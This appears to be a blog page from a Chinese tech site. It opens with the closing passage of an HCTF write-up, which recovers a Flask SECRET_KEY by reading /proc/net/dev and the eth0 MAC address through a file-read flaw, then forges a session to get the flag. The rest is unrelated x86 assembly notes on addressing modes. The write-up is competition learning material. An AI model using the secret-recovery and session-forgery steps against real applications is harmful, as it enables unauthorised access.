这里便可以通过linux强大的特殊文件系统来获取。首先利用之前的方法读取/proc/net/dev可以发现服务器上的所有网卡。可以发现服务器只有eth0和lo两个网卡。之后再读取/sys/class/net/eth0/address
即可获取eth0网卡的mac地址。获取了地址，我们便获取了SECRET_KEY，之后便可以使用我们上面的payload来伪造session从二获取flag。

后记

通过这次hctf深入的了解了flask的客户端session的生成过程，可以说hctf相比最近的一些神仙大战确实是异常很适合web狗的比赛了。每年的hctf都能学到一些东西，希望以后能多一些这样干货满满的比赛。○|￣|_
ps:如果出一道改了源码改了默认salt和签名机制的题目会不会被打死ヾ(≧∇≦*)ゝ

指令系统

Posted on 2018-10-27 | Edited on 2019-02-02

寻址方式

立即寻址
1
MOV AL,01010101B
寄存器寻址

MOV AX,BX

存储器操作数寻址

逻辑地址：段寄存器名称:偏移地址表达式
直接寻址
1
MOV BX,DS:[1234H]

寄存器间接寻址

1	MOV AL,[BX]

1 2	MOV BP,MESG MOV CL,ES:[BP] ;ES附加段MESG字节单元取数->CL

基址寻址

逻辑地址表达方式:段寄存器:[基址寄存器+位移量]/段寄存器:位移量[基址寻址器]
1
2
3
4
5
6
7
8
MOV DL,DS:[BP+10]
MOV EDX,[EAX+10H]
``` 
* 变址寻址
>段寄存器:[比例因子×变址寄存器+位移量]/段寄存器:位移量[比例因子×变址寄存器]
```asm
MOV AL,[2*EBX+10]
MOV AH,[SI+5] ;只能选择SI DI两个存储器

*基址加变址寻址

有比例因子的基地址加变址寻址：
段寄存器:[基址寄存器+比例因子×变址寄存器+位移量]
段寄存器:位移量[基址寄存器+比例因子x变址寄存器]
段寄存器:位移量[基址寄存器][比例因子x变址寄存器]
基址寄存器与变址寄存器都必须是规定的32位寄存器

没有比例因子的基址加变址寻址:
段寄存器:[基址寄存器+变址寄存器+位移量]
段寄存器:位移量[基址寄存器+变址寄存器]
段寄存器:位移量[基址寄存器][变址寄存器]
基址寄存器与变址寄存器必须是指定的16位寄存器

基址、变址、基址加变址这三种寻址方式中偏移地址表达式中的位移量是无符号整数

带有比例因子的变址寻址同行用于检索一维数组元素
带有比例因子的基址加变址通常用于检索二维数组